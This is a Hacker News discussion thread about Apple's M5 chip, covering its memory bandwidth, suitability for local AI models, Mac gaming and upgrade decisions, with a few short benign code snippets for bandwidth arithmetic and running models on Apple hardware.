      Kind of? It does support higher refresh rates, but their emphasis on "Retina" resolutions imposes a soft limit, because monitors that dense rarely support much more than 60 Hz due to the sheer bandwidth requirements.
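
      Back-of-envelope, for a 5K panel at 10-bit color (illustrative numbers, ignoring blanking and protocol overhead):

          # uncompressed pixel bandwidth for a 5120x2880 panel
          w, h, bits_per_px, hz = 5120, 2880, 30, 120  # 10-bit RGB
          gbps = w * h * bits_per_px * hz / 1e9
          print(f"{gbps:.1f} Gbit/s")  # ~53.1, vs ~25.9 Gbit/s of payload on DisplayPort 1.4

      So a 5K/120Hz stream needs DSC or a DP 2.x-class link, which few panels that dense actually ship with.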

  • yieldcrv 5 hours ago

    It's kind of a myth though, Mac has many flagship games and everything in between

    If you identify as a "gamer" and are in those communities, then you'll see communities talking about things you can't natively play

    but if you leave niches you already have everything

    and with microtransactions, Apple ecosystem users are the whales. again, not something that people who identify as "gamers" want to admit actually being okay with, but those people are not the revenue of game production.

    so I would say it is a missed opportunity for developers that are operating on antiquated calculations of MacOS deployment

    • bigyabai 2 hours ago

      > It's kind of a myth though

      It's kinda not. Here's a rough list of the 10 most-played games currently on PC: https://steamdb.info/charts/

      macOS is supported by one title (DOTA 2). Windows supports all 10, Linux (the free OS, just so we're clear) runs 7 of the games and has native ports of 5 of them. If you want to go argue to them about missed revenue opportunities then be my guest, but something tells me that DOTA 2 isn't being bankrolled by Mac owners.

      If you have any hard figures that demonstrate "antiquated calculations" then now is the time to fetch them for us. I'm somewhat skeptical.

zhyder an hour ago

"complementing the Neural Accelerators in the CPU and GPU" seems to be a misprint; I don't believe they have the accelerators in the CPU too.

Still super interesting architecture with accelerators in each GPU core _and_ a dedicated neural engine. Any links to software documentation for how to leverage both together, or when to leverage one vs the other?
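
There isn't much official documentation yet, but the routing decision already exists in Core ML today via compute units; presumably the new per-core GPU Neural Accelerators surface through Metal/MPS rather than a separate API. A minimal coremltools sketch (the model path is a placeholder):

    import coremltools as ct

    # load the same compiled model targeted at different silicon blocks
    on_ane = ct.models.MLModel("model.mlpackage",
                               compute_units=ct.ComputeUnit.CPU_AND_NE)   # Neural Engine
    on_gpu = ct.models.MLModel("model.mlpackage",
                               compute_units=ct.ComputeUnit.CPU_AND_GPU)  # GPU cores

As a rule of thumb, the Neural Engine wins on power efficiency for small fixed-shape models, while the GPU wins on flexibility and larger workloads.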

mattray0295 5 hours ago

They push these new generations out so quickly, and with crazy performance boosts. Impressive.

  • elric 2 hours ago

    Meanwhile, Intel seems to be doing a big bunch of nothing much. And AMD seems busy playing house with OpenAI to catch up to Nvidia on the GPU front.

    Now if only Apple would sell these for use outside of their walled garden.

jtrn an hour ago

No Wi-Fi 7. No 5G. No 16". No upgrade to max RAM. No upgrade to the screen. No Bluetooth 6. No upgrade for me. I’ll stay with my M1 Max for now.

  • _zoltan_ 44 minutes ago

    you're comparing your M1 Max with the base model M5, not M5 Max. chill. it will come.

vardump 8 hours ago

I guess I'm waiting for the M5 Max chip. Hopefully it's configurable with 256 GB RAM for LLMs and some VMs.

elnatro 44 minutes ago

I don’t understand why they don’t advertise this CPU as one capable of running local LLMs, because it can, right?
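
It can. With Apple's MLX framework, for example, it's a few lines (a sketch using the mlx-lm Python package; the model name is just one example from the mlx-community hub):

    from mlx_lm import load, generate

    # fetches a 4-bit quantized model and runs inference on the Apple GPU
    model, tokenizer = load("mlx-community/Mistral-7B-Instruct-v0.3-4bit")
    print(generate(model, tokenizer,
                   prompt="Why does unified memory help local LLMs?",
                   max_tokens=100))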

mrkaluzny 37 minutes ago

Emm… why does it say that a charger is not included with the purchase? That’s just crazy.

anteloper 2 hours ago

I can't find a single Moore's law chart that includes 2025 data (they all seem to cut off around 2020, actually).

Does anyone know if we're still on pace with Moore's law?

h1fra 8 hours ago

I keep seeing all those crazy screenshots from games on Mac, and yet there are barely any big releases for this platform. I guess it benefits a whole range of software, not just games, but still that's a pity.

  • tantalor 8 hours ago

    Because gaming on Mac actually looks bad in practice.

    https://news.ycombinator.com/item?id=44906305

    • qnpnp 5 hours ago

      This is easy to fix, not an explanation.

      Gaming on mac is indeed lacking, but that's really not the reason.

      • tantalor 4 hours ago

        It's a symptom of the deeper problem: Apple does not value game developers or the experience of users.

t1234s 3 hours ago

Any reason they don't have an Apple TV Pro with an M* chip targeted towards gaming?

  • quentindanjou 3 hours ago

    I think it is because there are not enough games to be the reason for integrating an M* chip.

    • boogieknite 2 hours ago

      probably right but on the other hand Apple is willing to throw mountains of $ at tv+ productions just to get ppl on their platform

      an economist could probably tell me why portioning some of that money to spend on game port budget isn't valuable. gamepass seems ripe to be undercut too

reacharavindh 7 hours ago

One thing that’d be a nice quality-of-life improvement in the MacBook (Air/Pro) is built-in 5G connectivity. I’d spring for that convenience: not needing to connect to a hotspot that drains precious battery on my phone. I thought we were closer given Apple has started making their own modems, but it is still a miss.

  • port3000 5 hours ago

    They want you to buy the Apple phone and pair it, so they sell more

perdomon an hour ago

It's kind of crazy that they insist on doing basically one of these every year. A lot of people complain that the iPhone stopped changing (meaningfully) between updates several years back. I think Apple Silicon is bound to be the same. I will say that the M4 Mac Mini was groundbreaking in terms of a budget-friendly Apple product -- I hope they recognized why it was loved and continue to iterate in that direction.

umvi 2 hours ago

I would buy a mac mini with an M* chip in the blink of an eye if merely upgrading the RAM didn't double the cost of the unit

thomascountz 24 minutes ago

Imagine Apple released a laptop that shipped without MacOS. Just the hardware, drivers, and the integrated M-series chips.

   The MacBook Zero

textlapse 3 hours ago

I wonder how much of the Nvidia DGX Spark announcement was meant to precede this M5 announcement by a day or two; the M5 MBP has higher performance, comes with a monitor attached, and has a (slightly) lower price tag.

If you could yank the screen out, it probably evens out :)

I have seen quite a few such announcements from competitors that land so close together that I wonder if they run competitor analysis so they can precede the Goliath by a few days (like Google vs the rest, Apple vs the rest, etc.).

heystefan 8 hours ago

Is it me or did they use to avoid calling it "AI"?

  • simonw 8 hours ago

    Yeah, they rebranded it "Apple Intelligence" but this press release appears to be mostly using AI in the same (vague) way that the rest of the industry does.

    Also just noticed this:

    "And now with M5, the new 14-inch MacBook Pro and iPad Pro benefit from dramatically accelerated processing for AI-driven workflows, such as running diffusion models in apps like Draw Things, or running large language models locally using platforms like webAI."

    First time I've ever heard of webAI - I wonder how they got themselves that mention?

    • rgo 6 hours ago

      > First time I've ever heard of webAI - I wonder how they got themselves that mention?

      I wondered the same. Went to Crunchbase and found out Crunchbase is now fully paywalled (!), well, saw that coming... Anyway, hit the webAI blog; apparently they were showcased at the M4 MacBook Air event in 2024 [1] [2]:

      > During a demonstration, a 15-inch Air ran a webAI’s 22 billion parameter Companion large language model, rendered a 4K image using the Blender app, opened several productivity apps, and ran the game Wuthering Waves without any kind of slowdown.

      My guess is this was the best LLM use-case Apple could dig up for their local-first AI strategy. And Apple Silicon is the best hardware use-case webAI could dig up for their local-first AI strategy. As for Apple, other examples would look too hacky, purely dev-oriented, and dependent on LLM behemoths from the US or China. I.e., "try your brand-new performant M5 chip with LM Studio loaded with China's DeepSeek or Meta's Llama" is an Apple exec no-go.

      1. https://www.webai.com/blog/why-apples-m4-macbook-air-is-a-mi...

      2. https://finance.yahoo.com/news/apple-updates-bestselling-mac...

thurn 8 hours ago

No "max" or "pro" equivalent? I wanted to get a new Macbook Pro, but there's no obvious successor to the M4 Max available, M5 looks like a step down in performance if anything.

allenrb 4 hours ago

I’d like a filter to remove all mention of AI and associated performance from copy like this. Maybe I can build it with… nvm.

Seriously, can’t you tell me about the CPU cores and their performance?

  • wina 4 hours ago

    why do you want more CPU cores and better performance than the M4, if not for running local AI models?

    • Remnant44 3 hours ago

      Essentially every other use case for a computer.

      Whether you're playing games, or editing videos, or doing 3D work, or trying to digest the latest bloated react mess on some website.. ;)

    • sib 3 hours ago

      Photo & video post-processing...

    • adastra22 4 hours ago

      CPU cores aren’t relevant to running AI?

GeekyBear 6 hours ago

I'd argue that calling the new matrix multiplication unit they added to the GPU cores a neural engine instead of a tensor processing unit is a branding error that will lead to confusion.

The existing neural engine's function is to maximize power efficiency, not flexible performance on models of any size.

  • bigyabai 5 hours ago

    I'd argue that Apple's definition of "neural engine" was entirely different from what the greater desktop, edge and datacenter markets already considered a "neural engine" to be.

    It's an improvement, nomenclature-wise.

gmm1990 8 hours ago

Interesting that there's only the M5 on the MacBook Pro. I thought the M4 and M4 Pro/Max launched at the same time on the MacBook Pro.

apatheticonion 30 minutes ago

Wake me up when I can play video games on my MacBook and I'll upgrade my MacBook M1 Pro.

Until then, I take a mini PC with me along with my M1 when I travel, use game streaming for gaming, and offload dev and AI work via SSH + SSH remote tools.

To me, M5 has amazing hardware, but they put square wheels on a Ferrari

gzer0 8 hours ago

The M5 chip is currently only available with up to 32 GB of RAM, in the 14-inch MacBook Pro variant, just FYI.

[1] https://www.apple.com/us-edu/shop/buy-mac/macbook-pro/14-inc...

  • pixelpoet 7 hours ago

    That's laughable in 2025, and together with the wimpy 153 GB/s memory bandwidth (come on, Strix Halo is 256GB/s at a fraction of the price!) they really don't have a leg to stand on calling this AI-anything!

    • hannesfur 7 hours ago

      As pointed out elsewhere, a better comparison will be the upcoming Pro & Max variants. Also, as far as I know, Strix Halo mainly uses the GPU for inference, not the little AI accelerator AMD has put on there. That one is just too limited.

    • Tepix 7 hours ago

      So you're saying these won't sell at all?

      • pixelpoet 6 hours ago

        I'm saying this is pretty weaksauce for AI-anything in 2025, especially considering the price tag. Sure, there will be later models with more memory and bandwidth (no doubt at eye-watering prices), but with 32 GB this model isn't it.

        I'm sure it's a perfectly fine daily driver, but you have to appreciate the irony of a massive chip loaded to the gills with matrix multiplication units, marketed as an amazing AI machine, and yet so hobbled by mem capacity and bandwidth.

newman8r 2 hours ago

What's sad is there's still no Asahi support for the M4. I have one and I barely ever use it for that reason.

aetherspawn 2 hours ago

Wish Boot Camp was free again… sick of paying for Parallels.

alberth 7 hours ago

Vision Pro went from M2 to M5; that's quite a jump in horsepower.

  • adamschwartz 5 hours ago

    Also ~200g heavier due in part to the counterweight in the new strap.

sebastianconcpt 8 hours ago

Wonder how it compares with the M4 Max that I've just bought haha

  • dmix 7 hours ago

    Same, I just bought an M4 Max 2 weeks ago and had a bit of anxiety for a moment. I'm going to justify it because they haven't released the M5 Max yet.

    • sebastianconcpt 7 hours ago

      It's going to be fine, what's important is what we do with the thingy :)

      Logos is King

maxk42 6 hours ago

For my use case I need MSL to support fp64. Until that happens I don't care what hardware changes they make: I'm not going to be filling racks with M5s, and they're not producing something I can use to even tinker with AI in my spare time. Apple has lost the AI war before it even got started, IMO.

criddell 7 hours ago

I wish I could get the nano-texture glass on a lower-spec iPad Pro. I probably only need the 512 GB model, and the glass is only available on the 1 and 2 TB models.

tonyhart7 17 minutes ago

Never thought I'd see the day when I'd say that an Apple device is one of the best ways to run an LLM.

jon-wood 8 hours ago

> Apple 2030 is the company’s ambitious plan to be carbon neutral across its entire footprint by the end of this decade by reducing product emissions from their three biggest sources: materials, electricity, and transportation.

But never, ever, through not shipping incremental hardware bumps every year regardless of whether there's anything really worth shipping.

  • asdhtjkujh 7 hours ago

    Very few people are buying a new machine every year, even when the updates (like this year) are arguably more than incremental — selling outdated hardware that will become obsolete sooner is not more environmentally-friendly.

    Hardware longevity and quality are probably the least valid criticisms of the current Macbook lineup. Most of the industry produces future landfill at an alarming rate.

  • Cthulhu_ 7 hours ago

    I'm always skeptical about these carbon-neutral pledges because in practice it's a lot of administrative magic, like paying a company that says it will plant trees or whatever, which will sign some official-looking paper saying 'ye apple totaly compensated three morbillion tonnes of carbon emissions'.

    And it's things like not including a charger, cable, or headphones anymore to reduce package size, which, sure, will save a little on emissions, but it's moot because people will still need those things.

  • SG- 7 hours ago

    The second-hand Apple market is very big, especially since the M-series MacBooks leapfrogged performance.

zoobab 8 hours ago

Does it run Linux?

rcarmo 5 hours ago

I'll take one inside an iPad mini, thank you very much.

pzo 5 hours ago

This is quite a weird and confusing move (probably on purpose). The M5 is released in a MacBook Pro, but the previous MacBook Pros had the M4 Pro or M4 Max, so this one is more like the MacBook Air series, or even the iPad Pro series.

They say "M5 offers unified memory bandwidth of 153GB/s, providing a nearly 30 percent increase over M4", but my old MacBook M2 Max has 400GB/s.

ChuckMcM 3 hours ago

I think it would be amazing to be able to buy an M5 based open platform.

jbjbjbjb 8 hours ago

I’m glad I opted to get the base model M4 Mac Mini rather than upgrade the memory for longevity.

benjaminclauss 8 hours ago

Despite the flak Apple gets, their M-series continues to impress me as I learn more about hardware.

jasoneckert 8 hours ago

With the same number and types (P/E) of cores, the M5 seems more like a feature refinement over M4. I wonder if this is a CPU that Apple released primarily for AI marketing purposes and perception, rather than to push the envelope.

nblgbg 7 hours ago

32GB is the maximum memory configuration for the 14-inch laptop, which isn’t sufficient for running local LLMs. I think a Mac Studio or Mac Mini with higher memory would be more useful.

randomtoast 8 hours ago

A unified memory bandwidth of 1,224 gigabits per second is quite impressive.

  • vardump 8 hours ago

    Probably gigabytes (GB) and not gigabits (Gb)?

    Edit: gigabits indeed. Confusing, my old M2 Max has 400 GB/s (3200 gigabits per second) bandwidth. I guess it's some sort of baseline figure for the lowest end configuration?

    Edit 2: 1,224 Gbps equals 153 GB/s. Perhaps M5 Max will have 153 GB/s * 4 = 612 GB/s memory bandwidth. Ultra double that. If anyone knows better, please share.

  • mihau 8 hours ago

    why? The M3 Ultra already had 800 GB/s (6,400 Gbps) memory bandwidth

    • NetMageSCW 8 hours ago

      But what did the base M3 have? Why compare to different categories?

      Edit: Apparently 100GB/s, so a 1.5x improvement over the M3 and a 1.25x improvement over the M4. That seems impressive if it scales to Pro, Max and Ultra.

    • sapiogram 8 hours ago

      And that was already impressive. High-end gaming computers with dual-channel DDR5 only reach ~100GB/s of CPU memory bandwidth.
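
      For reference, peak DDR5 bandwidth is just transfer rate × bus width × channels (a sketch, assuming DDR5-6400):

          mt_per_s = 6400e6        # DDR5-6400: 6.4e9 transfers per second
          bytes_per_xfer = 8       # one 64-bit channel
          channels = 2             # dual-channel desktop board
          print(mt_per_s * bytes_per_xfer * channels / 1e9)  # 102.4 GB/s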

      • Aurornis 8 hours ago

        High end gaming computers have far more memory bandwidth in the GPU, though. The CPU doesn’t need more memory bandwidth for most non-LLM tasks. Especially as gaming computers commonly use AMD chips with giant cache on the CPU.

        The advantage of the unified architecture is that you can use all of the memory on the GPU. The unified memory architecture wins where your dataset exceeds the size of what you can fit in a GPU, but a high end gaming GPU is far faster if the data fits in VRAM.

      • Rohansi 5 hours ago

        And you can find high-end (PC) laptops using LPDDR5x running at 8533 MT/s or higher which gives you more bandwidth than DDR5.

      • RossBencina 8 hours ago

        Right, but high-end gaming GPUs exceed 1000GB/s and that's what you should be comparing to if you're interested in any kind of non-CPU compute (tensor ops, GPU).

  • Havoc 8 hours ago

    I was looking at that number and thinking the opposite - that's oddly slow, at least in the context of a new Apple chip.

    Guessing that's their base tier and it'll increase on the higher-spec/more-memory models.

    • Retr0id 7 hours ago

      Perhaps they're worried that if they make the memory bandwidth too good, people will start buying consumer apple devices and shoving them into server racks at scale.

  • modeless 8 hours ago

    Nvidia DGX Spark has 273 GB/s (2184 gigabits with your units) and people are saying it's a disappointment because that's not enough for good AI performance with large models. All the neural accelerators in the world won't make it competitive in speed with discrete GPUs that all have way more bandwidth.

    • hannesfur 7 hours ago

      > All the neural accelerators in the world won't make it competitive in speed with discrete GPUs that all have way more bandwidth.

      That’s true for the on-GPU memory, but I think there is some subtlety here. MoE models have narrowed the difference considerably, in my opinion, because not all experts need to fit into GPU memory; with a fast enough bus you can stream them into place when necessary.

      But the key difference is the type of memory. While NVIDIA's datacenter GPUs have shipped with HBM for a while now, the DGX Spark and the M5 use LPDDR5X, which is the main source of their memory bottleneck. Unified-memory chips with HBM are definitely possible (GH200, GB200); they are just less power efficient at low/idle load.

      NVIDIA Grace sidestep: They actually use both HBM3e (GPU) and LPDDR5X (CPU) for that reason (load characteristics).

      The moat of the memory makers is just so underrated…

mrbonner 6 hours ago

I'm waiting for the day when the iPhone is equipped with an M chip. Maybe not too long a wait, I hope.

dmitshur 7 hours ago

The claimed 1.6x increase in video game frame rate compared to M4 seems pretty good. Looking forward to seeing it tested out in practice.

SXX 8 hours ago

32GB RAM limit on current M5 models. Now wait for M5 Max.

  • bombcar 8 hours ago

    M5 Max Macs

    If they're studios, you can have stacks of M5 Max Macs.

Insanity 7 hours ago

I assume they released this ahead of their end-of-month event in response to all the leaks from the past weeks.

mgaunard 3 hours ago

why is Apple focusing on AI? do they have any AI products like Google, Meta or OpenAI?

airza 8 hours ago

I get that they want a lot of their own Swift-based bindings, but I wish they could also keep their MPS PyTorch bindings up to date...
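
For context, using the existing MPS backend in stock PyTorch looks like this (a minimal sketch):

    import torch

    # fall back to CPU when the Metal backend isn't available
    device = torch.device("mps" if torch.backends.mps.is_available() else "cpu")
    x = torch.randn(1024, 1024, device=device)
    y = x @ x  # the matmul executes on the Apple GPU via Metal Performance Shaders

The gap the comment refers to is that newer ops and dtypes tend to land in the CUDA backend first, leaving MPS users waiting.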

looneysquash 4 hours ago

That's cool, but so much software only supports CUDA.

sneak an hour ago

Cool. My maxxed out M4 Max MBP is scheduled for delivery tomorrow. Guess I’ll return it.

  • ppeetteerr an hour ago

    The M5 Pro/Max models are likely going to arrive in March (but maybe earlier)

    • sneak an hour ago

      Oh, the M5s available max out at 32GB ram, even in the MBP. That’s a nonstarter for me in a pro machine.

sbbq 7 hours ago

The chips are great. Now they just need to improve the quite stagnant laptop hardware to go with it.

pier25 7 hours ago

Does the M5 feature the UltraFusion connector which would enable the Ultra variant?

  • ozaiworld 7 hours ago

    that would likely only be present on the Max chip of the M5 generation

    • pier25 4 hours ago

      thanks I had always assumed it needed to be present in the base design of the chip

willahmad 8 hours ago

Are we going to see SOTA local coding models anytime soon with this hardware, or is there still a long way to go?

  • Etheryte 8 hours ago

    You can already do that; just how slow or fast you go depends on how much you're ready to pay for memory. It's a $1,200 premium to go from 36GB to 128GB of unified memory, a cost that's hard to justify unless you really need it, or someone else is paying.

    • willahmad 8 hours ago

      None is comparable to GPT-5 or Sonnet 4.5 experience

      • elzbardico 3 hours ago

        Frankly, right now I am way more satisfied with qwen-3-coder-420 using Cerebras inference than with those more powerful models.

        Inference speed and fast feedback matter a lot more than perfect generation to me.

jdlyga 7 hours ago

If only the Windows ecosystem could make processor transitions as smooth as the Mac's.

  • lostmsu 6 hours ago

    I don't think it is the ecosystem. The ARM CPUs not from Apple are just too slow.

    • wmf 5 hours ago

      X Elite and N1X are fine; the problem is with Windows.

      • bigyabai 2 hours ago

        As someone who admins Linux and Windows ARM machines, rest assured the issue is not just with Windows. ARM support is best-effort on most distros, and still fairly incomplete even on nixpkgs and Debian unstable.

mittermayr 7 hours ago

This morning I was looking to maybe replace my MacBook Pro 2018, which had the horrible keyboard and finally seems crippled enough to not be fun to use anymore — now this!

However, I have been disappointed by Apple too many times (they wouldn't replace my keyboard despite their highly-flamed design faux pas, I've had to replace the battery twice by now, etc.).

Two years ago I finally stopped replacing their expensive external keyboards, which I used to buy once a year or every other year (due to broken key hinges), and have been incredibly positively surprised after getting used to the MX Keys. Much better built, incredible mileage for the price. Plus, I can easily switch and use them on my Windows PC, too.

So, about the MacBook: if I were to switch mobile computing over to Windows, what can I replace it with? My main machine is still a Mac Mini M2 Pro, which is perfect value for the price. I like the Surface as a concept (replaceable keyboards are a fantastic idea; the battery, however, is super iffy nonsense), and I've got a Surface Pro 6 around, but it's essentially the same gloss premium I don't need for my use.

Are there any much-cheaper but somewhat comparable laptops (12h+ battery, 1 TB disk, 16-32GB RAM, 2k+ Display) with reasonable build quality? Does bypassing the inherent premium of all the Apple gloss open up any useful options? Or is Apple actually providing the best value here?

Would love to hear from non-Surface, non-Thinkpad (I love it, but) folks who've got some recommendations for sub $1k laptops.

Not my main machine, but something I take along train rides, or when going to clients, or sometimes working offsite for a day.

  • vachina 5 hours ago

    LG Gram SuperSlim. Very light (900 grams). I once went hiking with it and forgot the laptop was still in the bag.

    But it's really only capable of high performance in short bursts because of the extremely small thermal mass.

    • mittermayr 5 hours ago

      thanks for the hint. Spec-wise this is exactly what I meant: 1TB SSD, 16GB RAM, 16 hours of battery, very nice. Then I saw it's 1700 EUR where I am at the moment, so pretty much MacBook Pro price :(

mrlonglong 5 hours ago

Good old Brits, taking over the world with an ISA so extraordinarily efficient that, at its inception, they discovered the processor kept operating by sucking voltage from leakage currents even though the power was off.

From: https://www.theregister.com/2012/05/03/unsung_heroes_of_tech...

"> The power test tools they were using were unreliable and approximate, but good enough to ensure this rule of thumb power requirement. When the first test chips came back from the lab on the 26 April 1985, Furber plugged one into a development board, and was happy to see it working perfectly first time.

> Deeply puzzling, though, was the reading on the multimeter connected in series with the power supply. The needle was at zero: the processor seemed to be consuming no power whatsoever.

> As Wilson tells it: “The development board plugged the chip into had a fault: there was no current being sent down the power supply lines at all. The processor was actually running on leakage from the logic circuits. So the low-power big thing that the ARM is most valued for today, the reason that it's on all your mobile phones, was a complete accident."

> Wilson had, it turned out, designed a powerful 32-bit processor that consumed no more than a tenth of a Watt."

StopDisinfo910 8 hours ago

I appreciate Apple propping up the GPU performance of their SoCs, but it feels a bit pointless when all the libraries they provide are so insular and disconnected from the rest of the industry.

I personally wish they would learn from the failure of Metal.

Also, "unleashes"? Really? The marketing madness has to stop at some point.

  • dralley 7 hours ago

    Not that I've actually used any of these APIs, but supposedly Metal is the best-designed graphics API by a decent margin; it's just severely handicapped by how insular they and their ecosystem are.

    • bigyabai 2 hours ago

      Depends on what you're comparing to. Many people will point to OpenGL and Vulkan as comparisons, which is fair. But those are just the Open Source alternatives, and Metal itself is a proprietary solution competing against other well-designed alternatives like DirectX and NVN.

      I think Metal's ergonomics advantage is a much slimmer lead when you consider the other high-level APIs it competes with.

  • mcv 8 hours ago

    Soon they'll be stomping all over your calculation problems, and then obliterating them!

LarsDu88 4 hours ago

It's disappointing to me how far behind other chipmakers are in having a unified GPU/CPU memory bus. Only AMD's Strix Halo even attempts this. Well, this announcement tipped my hand and I'm finally buying a new MacBook :)

davidw 6 hours ago

Are we headed back to the bad old days of very proprietary systems, where megacorps dictate everything?

kotaKat 7 hours ago

Surprised they aren’t beating the "performance per watt" drum they normally do on Mx releases. I’m assuming this will be a bit of a snoozer until the M5X/M5 Ultra or an M6 hits the pipeline.

If anything, these refreshes let them get rid of the last old crap in the line, the M1 and M2, tie up loose ends with Walmart over the $599 M1 Air they still make for ‘em, and start shipping the A18 Pro-based MacBooks in November.

  • ajross 3 hours ago

    They don't have a new process node to launch on, so one wouldn't expect the power metrics to improve at all.

busymom0 4 hours ago

> M5 brings its industry-leading power-efficient performance to the new 14-inch MacBook Pro, iPad Pro, and Apple Vision Pro

Not for Mac mini?

  • supernes 4 hours ago

    They'll put it in the Mini when they push out a new Studio to upsell to.

sidcool 7 hours ago

I wonder if they informed Jensen about it.

superkuh 7 hours ago

I know it's only shared system RAM and not VRAM, but the M5's 153GB/s isn't going to be very fast for AI inference. A fairly old RTX 3060 12GB does 360GB/s. But I guess quantity is a quality all of its own when it comes to RAM and inference.
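
A crude way to quantify that: single-stream decode speed is roughly bounded by bandwidth ÷ model size, since every generated token has to read (more or less) all the weights once. A sketch, assuming an ~8B-parameter model quantized to 4 bits (~4 GB of weights):

    def max_tokens_per_s(bandwidth_gb_s, model_gb):
        # upper bound: weights are streamed once per generated token
        return bandwidth_gb_s / model_gb

    print(max_tokens_per_s(153, 4.0))  # ~38 tok/s ceiling for the base M5
    print(max_tokens_per_s(360, 4.0))  # ~90 tok/s ceiling for an RTX 3060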

GaggiX 8 hours ago

>The 10-core GPU features a dedicated Neural Accelerator in each core

"The neural engine features a graphic accelerator" probably M6

jdc0589 6 hours ago

this is cool and all, but what I'm really excited about is the possibility that one day they'll update their laptops so the keys stop leaving marks on the screen.

I know we are a few major scientific breakthroughs away from that even being remotely possible, but it sure would be nice.

tiahura 8 hours ago

No 16”?

  • adamch 8 hours ago

    They'll announce that along with M5 Pro and Max in March or so.

jadbox 8 hours ago

... no benchmarks?

lenerdenator 8 hours ago

Now if some game companies would just port their wares to Apple Silicon and the MacOS libraries already...

exabrial 7 hours ago

Apple's software division has lost its way. They've done nothing but add flashy features and move buttons around, deprecating things and breaking backwards compatibility (yeah, 32-bit has been a while now, but alas), meanwhile retreating on stability.

Snow Leopard still remains the company's crowning achievement: zero bloatware, zero "mobile features on desktop" (wtf is this even a thing?), tuned for absolute speed and stability.

  • morshu9001 2 hours ago

    I liked Snow Leopard too, it was indeed the last focused Mac OS, but there was some memory-related bug that made me update past it. The new OSes aren't so bad, but yeah I don't touch any of the new features.

  • badc0ffee 5 hours ago

    I've heard about rounded corners and low information density windows in Tahoe, but what "mobile features on desktop" are in Sequoia and earlier? The App Store? Launchpad? iCloud? Notifications? You don't need to use those.

  • raw_anon_1111 7 hours ago

    They completely removed hardware support for 32-bit software.

    • morshu9001 2 hours ago

      This was in the Intel generation of Macs. If Windows can support 32-bit software, then so could the Mac, along with all the 64-bit software that got broken in random Mac updates.

      Ironically I can still run old 32-bit Windows software in Wine on my M1 Mac. Windows software is more stable on a Mac than Mac software.

      • raw_anon_1111 2 hours ago

        Do you think they didn’t know they were moving away from Intel when they did that? Besides, code was shared between macOS and iOS even then. They removed 32-bit support from their ARM processors years before they moved to ARM-based Macs.

        • morshu9001 2 hours ago

          They probably did, but just because the M1 got released doesn't mean Intel Macs suddenly didn't have 32-bit-capable hardware. I get why it was easier to drop it in the new OS regardless of hardware; it just throws a lot of software under the bus, and running software is kind of the OS's main job.

          And the hardware isn't a showstopper anyway. Apple did x86-64 on Apple Silicon, Windows' WoW64 does x86-32 on ARM64 or even IA-64, and I'll bet Windows will do x86-32 on x86-64 if Intel ever drops the 32-bit mode. Wine's 32-on-64 will run x86-32 on Apple Silicon already.

          • raw_anon_1111 an hour ago

            And Windows is also a bloated mess that they couldn’t use on mobile and their ARM initiatives have gone nowhere.

            If you don’t think Windows is a bloated mess, look up all of the different ways you have to represent a “string” depending on the API you are calling.

            • morshu9001 an hour ago

              Sure, but those are unrelated. Microsoft doesn't make the chips, and Windows' crappiness is its own thing. It's not like macOS would turn to crap if they made Rosetta 2 support x86-32, or in general stopped breaking all the 3P software.

              • raw_anon_1111 an hour ago

                Windows' crappiness is because they won't ever deprecate anything. Read some of Raymond Chen's posts about all the special-casing they did for apps that broke on newer versions of Windows because their developers were using unpublished APIs.

                Every bit of backwards compatibility increases the testing surface and the vulnerabilities. In fact, an early bug in Windows NT let a client encode DOS shell commands in the browser URL bar, and they would run with admin privileges if the server was running IIS.

                Should Apple have also kept 68K emulation around? PPC?

                • morshu9001 13 minutes ago

                  Apple went to the other extreme. Even if you use public APIs exactly the way they want, your software will break frequently. And this is without even getting into the whole OpenGL-vs-Metal drama.

                  In Windows they took things a bit too far by not only supporting old stuff but also treating it as first-class. If software is too outdated, it's fair to stick it behind some compat layer that makes it slower, as long as it still runs. But that's not even the biggest problem with Windows; it's Microsoft turning it into adware, and not being Unix-like in the first place.

                  To answer your last question: yes for PPC, at least. 68K is too old to matter. An emulation layer doesn't need to hold back the entire system. If it means fewer dev resources spent on glass effects and emojis, fine.

nake13 8 hours ago

It seems this generation focuses more on GPU and AI acceleration rather than CPU. The M5 chip allows Apple Vision Pro to render 10% more pixels and operate at up to 120 Hz. It delivers up to four times the peak GPU compute performance compared with M4, provides 30% higher graphics performance, and offers 15% faster multithreaded CPU performance.

ThrowawayR2 6 hours ago

A computing device named M5 with highly advanced AI capabilities meant for enterprise (or Enterprise) computing environments? Uh-oh, I think I'll pass; I saw this episode of Star Trek (TOS: The Ultimate Computer) before. Hope the owner's manual comes with a warning not to wear a red shirt anywhere near it, dohohoho.

(Perhaps it would be safer to wait for The Next Generation?)

exabrial 7 hours ago

> A nearly 30 percent increase in unified memory bandwidth to 153GB/s

I'll believe the benchmarks, not the marketing claims, but an observation and a question:

1. The AMD EPYC 4585PX has ~89GB/s, with pretty good latency, as long as you use 2 DIMMs.

2. How does this compare to the memory bandwidth and latency of the M1, M2, M3, and M4 in reality, with all of the caveats? It seems like the M1 was a monumental leap forward, and everything since has been incremental.